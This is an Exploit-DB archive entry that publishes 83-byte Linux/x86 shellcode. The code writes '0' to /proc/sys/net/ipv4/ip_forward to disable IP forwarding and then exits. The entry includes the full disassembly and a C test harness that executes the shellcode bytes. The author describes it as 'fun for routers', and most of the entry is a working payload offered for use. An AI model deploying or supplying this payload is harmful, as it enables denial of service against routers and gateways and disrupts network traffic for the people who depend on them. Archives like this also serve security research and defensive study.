Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)

2009-01-01T00:00:00
ID EDB-ID:43743
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes). Shellcode exploit for Linux_x86 platform

                                        
                                            /*
    In The Name of G0D
    
    Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit() 
    Size : 83 Bytes
    
    fun for routers ;)
    
    Author : By Hamid Zamani (aka HAMIDx9)
    Member of ^^Ashiyane Digital Security Team^^
    

Disassembly of section .text:

08048054 <_start>:
 8048054:   31 c0                   xor    %eax,%eax
 8048056:   50                      push   %eax
 8048057:   68 77 61 72 64          push   $0x64726177
 804805c:   68 5f 66 6f 72          push   $0x726f665f
 8048061:   68 34 2f 69 70          push   $0x70692f34
 8048066:   68 2f 69 70 76          push   $0x7670692f
 804806b:   68 2f 6e 65 74          push   $0x74656e2f
 8048070:   68 73 79 73 2f          push   $0x2f737973
 8048075:   68 72 6f 63 2f          push   $0x2f636f72
 804807a:   66 68 2f 70             pushw  $0x702f
 804807e:   89 e3                   mov    %esp,%ebx
 8048080:   31 c9                   xor    %ecx,%ecx
 8048082:   b1 01                   mov    $0x1,%cl
 8048084:   b0 05                   mov    $0x5,%al
 8048086:   cd 80                   int    $0x80
 8048088:   89 c3                   mov    %eax,%ebx
 804808a:   31 c9                   xor    %ecx,%ecx
 804808c:   51                      push   %ecx
 804808d:   6a 30                   push   $0x30
 804808f:   89 e1                   mov    %esp,%ecx
 8048091:   31 d2                   xor    %edx,%edx
 8048093:   b2 01                   mov    $0x1,%dl
 8048095:   b0 04                   mov    $0x4,%al
 8048097:   cd 80                   int    $0x80
 8048099:   31 c0                   xor    %eax,%eax
 804809b:   83 c0 06                add    $0x6,%eax
 804809e:   cd 80                   int    $0x80
 80480a0:   31 c0                   xor    %eax,%eax
 80480a2:   40                      inc    %eax
 80480a3:   31 db                   xor    %ebx,%ebx
 80480a5:   cd 80                   int    $0x80
*/

#include <stdio.h>

int main(int argc,char **argv)
{

char shellcode[] = "\x31\xc0\x50\x68\x77\x61\x72\x64\x68"
                   "\x5f\x66\x6f\x72\x68\x34\x2f\x69\x70"
                   "\x68\x2f\x69\x70\x76\x68\x2f\x6e\x65"
                   "\x74\x68\x73\x79\x73\x2f\x68\x72\x6f"
                   "\x63\x2f\x66\x68\x2f\x70\x89\xe3\x31"
                   "\xc9\xb1\x01\xb0\x05\xcd\x80\x89\xc3"
                   "\x31\xc9\x51\x6a\x30\x89\xe1\x31\xd2"
                   "\xb2\x01\xb0\x04\xcd\x80\x31\xc0\x83"
                   "\xc0\x06\xcd\x80\x31\xc0\x40\x31\xdb"
                   "\xcd\x80";
                   
     printf("Length: %d\n",strlen(shellcode));
     (*(void(*)()) shellcode)();
     
     return 0;
}